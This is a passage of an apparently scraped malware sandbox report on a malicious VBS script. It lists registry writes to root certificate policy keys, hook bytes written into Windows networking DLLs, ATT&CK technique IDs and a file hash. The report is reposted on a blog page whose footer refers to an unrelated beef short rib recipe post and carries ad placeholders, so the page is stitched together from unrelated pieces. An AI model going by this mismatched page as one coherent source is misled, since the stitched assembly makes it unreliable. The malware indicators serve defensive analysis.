      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS")
      source
      Registry Access
      relevance
      10/10
      ATT&CK ID
      T1112 (Show technique in the MITRE ATT&CK™ matrix)
  • Unusual Characteristics
    • Installs hooks/patches the running process
      details
      "wscript.exe" wrote bytes "e739f676e1a6fa762e71fa76ee29fa7685e2f5766da0fa769064f9763ad5007726e4f576d16dfa76003df876804bf87600000000ad378b758b2d8b75b6418b7500000000" to virtual address "0x74811000" (part of module "WSHIP6.DLL")
      "wscript.exe" wrote bytes "fae6f576e1a6fa762e71fa76ee29fa7685e2f5766da0fa7626e4f576d16dfa76003df876804bf87600000000ad378b758b2d8b75b6418b7500000000" to virtual address "0x742E1000" (part of module "WSHTCPIP.DLL")
      "wscript.exe" wrote bytes "c04ef8762054f976e065f976b538fa760000000000d0607500000000c5ea60750000000088ea607500000000e968e8748228fa76ee29fa7600000000d269e874000000007dbb60750000000009bee87400000000ba18607500000000" to virtual address "0x77191000" (part of module "NSI.DLL")
      "wscript.exe" wrote bytes "41fa1307" to virtual address "0x6DBF1FFC" (part of module "MSCORWKS.DLL")
      source
      Hook Detection
      relevance
      10/10
      ATT&CK ID
      T1179 (Show technique in the MITRE ATT&CK™ matrix)

File Details

All Details:

MSG_198368.vbs

Filename
MSG_198368.vbs
Size
941KiB (963769 bytes)
Type
script vbs
Description
ASCII text, with very long lines
Architecture
WINDOWS
SHA256
22f240cc77ced030b4f2f2987c0f00805d89ffbe6310cb7e59c8023bbc78cade Copy SHA256 to clipboard

Screenshots

Loading content, please wait...

Hybrid Analysis

Tip: Click an analysed process below to view more details.

Analysed 1 process in total.

  • wscript.exe "C:\MSG_198368.vbs" (PID: 1828)

Network Analysis

DNS Requests

HTTP Traffic

Suricata Alerts

ET rules applied using Suricata. Find out more about proofpoint ET Intelligence here.

Extracted Files

No significant files were extracted.

Notifications

  • Although all strings were processed, some are hidden from the report in order to reduce the overall size
  • Enforcing malicious verdict, as a reliable source indicates high confidence
  • Not all sources for indicator ID "api-55" are available in the report
  • Not all sources for indicator ID "api-64" are available in the report
  • Not all sources for indicator ID "registry-17" are available in the report
  • Not all sources for indicator ID "registry-18" are available in the report
  • Not all sources for indicator ID "registry-19" are available in the report
  • Not all sources for indicator ID "registry-72" are available in the report

  • Sample was not shared with the community

    • moransichim.blogspot.com

    Source: https://www.hybrid-analysis.com/sample/22f240cc77ced030b4f2f2987c0f00805d89ffbe6310cb7e59c8023bbc78cade?environmentId=100

    0 Response to "Bellted Galloway Beef Short Rib Alliums Red Wine and Green Peppercorn Sauce"

    Post a Comment

    Subscribe to: Post Comments (Atom)

    Iklan Atas Artikel

    Iklan Tengah Artikel 1

    Iklan Tengah Artikel 2

    Iklan Bawah Artikel